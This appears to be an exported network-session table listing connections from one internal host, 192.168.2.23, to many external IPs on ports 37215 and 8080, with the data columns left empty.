                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30427192.168.2.235033895.57.60.3637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30428192.168.2.234455441.103.121.18137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30429192.168.2.233876441.106.110.13637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30430192.168.2.2334230197.124.99.12137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30431192.168.2.2359102197.30.56.16937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30432192.168.2.2353586157.154.171.22237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30433192.168.2.2347020157.83.214.22437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30434192.168.2.2335982160.143.58.17137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30435192.168.2.235755841.227.202.5937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30436192.168.2.235104041.75.151.24637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30437192.168.2.234986841.168.26.20237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30438192.168.2.2354702197.62.24.12137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30439192.168.2.2335582157.162.120.21837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30440192.168.2.2341042197.3.10.20637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30441192.168.2.233994041.244.83.4937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30442192.168.2.2360458179.111.115.13137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30443192.168.2.2358186197.106.194.23337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30444192.168.2.2339988157.251.150.11837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30445192.168.2.234330653.108.22.5537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30446192.168.2.2339098197.5.100.5637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30447192.168.2.2353256157.163.238.1537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30448192.168.2.2340592157.10.156.19737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30449192.168.2.2359182157.86.66.22337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30450192.168.2.2356962157.158.126.18137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30451192.168.2.233487841.149.28.15437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30452192.168.2.2356610157.208.34.14037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30453192.168.2.233361241.86.70.20337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30454192.168.2.233346041.146.141.25537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30455192.168.2.2355664121.26.49.737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30456192.168.2.2360870197.183.67.22437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30457192.168.2.235546841.73.211.4137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30458192.168.2.235814877.227.231.24137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30459192.168.2.235960423.138.145.11637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30460192.168.2.2334220197.56.38.7137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30461192.168.2.2340718197.33.247.21937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30462192.168.2.2338972209.39.15.7737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30463192.168.2.233967241.51.95.5737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30464192.168.2.2358714157.170.133.8337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30465192.168.2.2337874157.209.183.2437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30466192.168.2.2347344197.120.216.1037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30467192.168.2.2355770197.144.242.1037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30468192.168.2.234332041.80.34.16137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30469192.168.2.2343278157.31.7.6237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30470192.168.2.2348362157.229.91.8637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30471192.168.2.2333742137.80.84.13637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30472192.168.2.2348178197.219.181.21037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30473192.168.2.235779241.175.140.11337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30474192.168.2.2355612157.230.184.20737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30475192.168.2.234904441.68.52.18737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30476192.168.2.234029844.63.128.21637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30477192.168.2.2345978172.196.228.8137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30478192.168.2.235585241.80.6.8937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30479192.168.2.2333742157.242.253.25437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30480192.168.2.2353930157.232.91.24637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30481192.168.2.2351982197.152.66.037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30482192.168.2.2354796160.1.228.14337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30483192.168.2.235319241.26.67.9137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30484192.168.2.234164887.157.89.23537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30485192.168.2.2339896157.210.66.13437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30486192.168.2.2354014157.15.180.25437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30487192.168.2.2348750157.248.79.21837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30488192.168.2.233508841.97.248.14937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30489192.168.2.233579496.53.101.2237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30490192.168.2.2348670157.30.67.14437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30491192.168.2.233989441.104.40.24437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30492192.168.2.2349524162.158.103.4637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30493192.168.2.2354240171.216.182.6737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30494192.168.2.2340220157.29.88.10337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30495192.168.2.234986041.190.147.12337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30496192.168.2.235412841.163.249.3937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30497192.168.2.2351594157.153.128.9537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30498192.168.2.233760241.99.254.19837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30499192.168.2.2334412197.37.114.23837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30500192.168.2.2342558157.216.167.3237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30501192.168.2.2348928179.233.128.1537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30502192.168.2.235333641.29.107.2137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30503192.168.2.2339308157.246.140.5537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30504192.168.2.233766841.11.210.8037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30505192.168.2.2353974197.18.220.17037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30506192.168.2.2354090197.91.48.1937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30507192.168.2.234852479.188.117.12537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30508192.168.2.2335360151.244.248.16037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30509192.168.2.234728041.238.176.17537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30510192.168.2.2348206104.107.226.16337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30511192.168.2.2350890164.165.135.23837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30512192.168.2.2332774218.148.50.12037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30513192.168.2.2339378197.208.145.14137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30514192.168.2.2332768140.147.43.8337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30515192.168.2.233561041.50.75.10437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30516192.168.2.233448841.210.187.4937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30517192.168.2.2355712157.43.223.9337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30518192.168.2.2339954157.172.76.8937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30519192.168.2.2354204157.143.187.9637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30520192.168.2.2348034157.239.35.1037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30521192.168.2.2341790217.251.75.25437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30522192.168.2.2356868197.31.201.6837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30523192.168.2.2356026157.180.204.9637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30524192.168.2.2333216157.4.102.6737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30525192.168.2.234542441.246.226.4937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30526192.168.2.2349536105.200.112.4437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30527192.168.2.2351744197.240.180.13237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30528192.168.2.2354066157.246.93.4337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30529192.168.2.2338564157.241.6.2837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30530192.168.2.2358032197.26.119.2437215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30531192.168.2.2344210157.182.95.16937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30532192.168.2.234273841.39.169.20937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30533192.168.2.2356080157.16.121.12137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30534192.168.2.2344822195.62.170.14837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30535192.168.2.2357186197.157.193.2937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30536192.168.2.233309641.13.243.13137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30537192.168.2.2360628197.134.80.8337215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30538192.168.2.235017441.101.62.7137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30539192.168.2.2360208197.35.168.23137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30540192.168.2.2345222197.198.22.17537215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30541192.168.2.233895241.169.43.21237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30542192.168.2.2335428221.179.208.3937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30543192.168.2.2344972197.219.229.7037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30544192.168.2.2336010157.91.213.16937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30545192.168.2.2335584147.148.76.637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30546192.168.2.234540041.26.201.2737215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30547192.168.2.234839641.201.96.15037215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30548192.168.2.235454841.98.114.2937215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30549192.168.2.235982017.121.71.25237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30550192.168.2.233601641.52.66.1237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30551192.168.2.234687041.155.165.24837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30552192.168.2.233969034.204.37.9637215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30553192.168.2.233664241.135.165.5837215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30554192.168.2.2359602199.227.251.5137215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30555192.168.2.2343026157.131.137.8237215
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30556192.168.2.2334318147.216.195.1908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30557192.168.2.235015878.93.76.1068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30558192.168.2.2360738150.160.29.1628080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30559192.168.2.233476681.15.206.2148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30560192.168.2.235243842.248.225.568080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30561192.168.2.2334106164.238.10.458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30562192.168.2.2338480208.168.231.208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30563192.168.2.2340838126.120.103.338080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30564192.168.2.2349996101.191.227.1618080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30565192.168.2.2359790212.147.62.1298080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30566192.168.2.2360490144.180.201.1798080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30567192.168.2.2357822207.234.106.2438080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30568192.168.2.2359458179.165.105.1878080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30569192.168.2.2340400170.129.57.2508080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30570192.168.2.2358368221.162.108.358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30571192.168.2.2352012105.184.142.2238080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30572192.168.2.2346932148.53.33.1528080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30573192.168.2.2338232190.229.92.428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30574192.168.2.2357002166.14.167.718080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30575192.168.2.235850879.248.91.358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30576192.168.2.2358898103.155.116.1538080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30577192.168.2.2346544146.1.40.1068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30578192.168.2.235711227.75.71.1918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30579192.168.2.2340804182.233.184.1878080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30580192.168.2.235275267.120.241.1718080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30581192.168.2.2338180213.190.183.518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30582192.168.2.2345300180.97.231.1198080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30583192.168.2.2341090174.5.68.1578080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30584192.168.2.234964691.214.17.208080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30585192.168.2.233676482.94.39.1448080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30586192.168.2.2342334112.144.146.1808080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30587192.168.2.234627870.131.112.1758080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30588192.168.2.234439845.90.164.08080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30589192.168.2.2347482203.19.56.288080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30590192.168.2.23337465.203.89.2518080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30591192.168.2.2337120130.61.204.1908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30592192.168.2.234859039.80.14.1908080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30593192.168.2.2354134148.52.227.2228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30594192.168.2.235863625.19.232.2368080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30595192.168.2.2342838218.159.86.1638080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30596192.168.2.2346942165.47.60.918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30597192.168.2.235934247.117.75.358080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30598192.168.2.2355766117.131.173.1398080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30599192.168.2.234457447.159.49.48080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30600192.168.2.2341360182.152.195.1888080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30601192.168.2.234108460.111.102.1468080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30602192.168.2.2338764205.177.192.1068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30603192.168.2.233283248.71.166.2248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30604192.168.2.23455249.94.220.1278080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30605192.168.2.2349864148.12.53.168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30606192.168.2.234630674.88.8.918080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30607192.168.2.2339206169.212.139.958080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30608192.168.2.234191264.153.220.578080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30609192.168.2.2358574137.69.129.1748080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30610192.168.2.2348842220.245.51.1148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30611192.168.2.234817058.159.8.1488080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30612192.168.2.2344248222.147.25.1588080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30613192.168.2.235763443.131.143.2108080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30614192.168.2.233403043.106.14.2258080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30615192.168.2.2350770187.172.243.1878080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30616192.168.2.235653045.120.237.2068080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30617192.168.2.235745481.23.233.1928080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30618192.168.2.233424840.119.241.1788080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30619192.168.2.235376832.33.153.1158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30620192.168.2.2351270123.96.201.228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30621192.168.2.234185896.249.12.858080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30622192.168.2.235155697.70.137.1168080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30623192.168.2.235292253.103.62.1568080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30624192.168.2.23390402.101.101.2408080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30625192.168.2.2352124171.249.237.1888080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30626192.168.2.2342362203.40.219.228080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30627192.168.2.2336954144.223.27.1248080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30628192.168.2.233680888.166.38.1958080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30629192.168.2.2349612120.5.130.2218080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30630192.168.2.2341052223.200.145.2148080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30631192.168.2.2348336121.217.228.1748080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30632192.168.2.2355184196.169.183.1158080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30633192.168.2.2346160190.55.255.88080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30634192.168.2.2339682200.74.79.1458080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30635192.168.2.2359654104.46.160.428080
                                                        TimestampBytes transferredDirectionData


                                                        Session IDSource IPSource PortDestination IPDestination Port
                                                        30636192.168.2.235152842.36.183.678080
